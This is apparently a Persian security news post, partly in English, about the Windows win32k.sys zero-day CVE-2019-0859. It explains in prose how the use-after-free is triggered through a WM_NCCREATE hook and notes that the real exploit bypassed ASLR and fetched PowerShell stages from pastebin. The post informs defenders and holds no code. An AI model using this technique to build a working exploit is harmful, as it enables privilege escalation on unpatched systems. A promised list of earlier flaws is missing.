حفره امنیتی جدید zero-day CVE-2019-0859 در win32k.sys

1398/01/26 ادمین سایت

در ماه مارس سال ۲۰۱۹ سیستم های خودکار پیشگیری از نفوذ شرکت کسپرسکی موفق به کشف یک حفره امنیتی در سیستم عامل ویندوز مایکروسافت گردید. بررسی های بیشتر منجر شد تا ضعف امنیتی zero-day که محل دقیق آن در win32k.sys مشخص گردد. این پنجمین نقص امنیتی در سیستم عامل ویندوز است که طی چند ماه گذشته توسط کارشناسان این شرکت شناسایی شده است، موارد قبلی عبارتند از:

موارد فوق توسط کارشناسان کسپرسکی طبق یک گزارش به شرکت مایکروسافت اعلام گردید. مایکروسافت این نواقص را مورد بررسی قرار داد، وجود آن ها را تائید کرد و پس از مدتی یک پچ منتشر کرد که تنها بخشی از این نواقص را بر طرف نمود و در باقی موارد به روز رسانی و تقویت سیستم امنیتی توسط کارشناسان شرکت کسپرسکی (Vasiliy Berdnikov و Boris Larin) انجام گرفت.

جهت دریافت آپدیت های مورد نظر به سایت مایکروسافت مراجعه کنید.

اطلاعات فنی بیشتر

CVE-2019-0859 is a Use-After-Free vulnerability that is presented in the CreateWindowEx function. During execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.

In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0 and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address for the window procedure that was executed immediately after our hook. The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE. Because of that, sending of the NCCREATE message will be considered a failed operation and CreateWindowEx function will stop execution with a call to FreeWindow. Because our MENU-class window was not actually initialized, it allows us to gain control over the address of the memory block that is freed.

حفره امنیتی جدید zero-day CVE-2019-0859 در win32k.sys

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.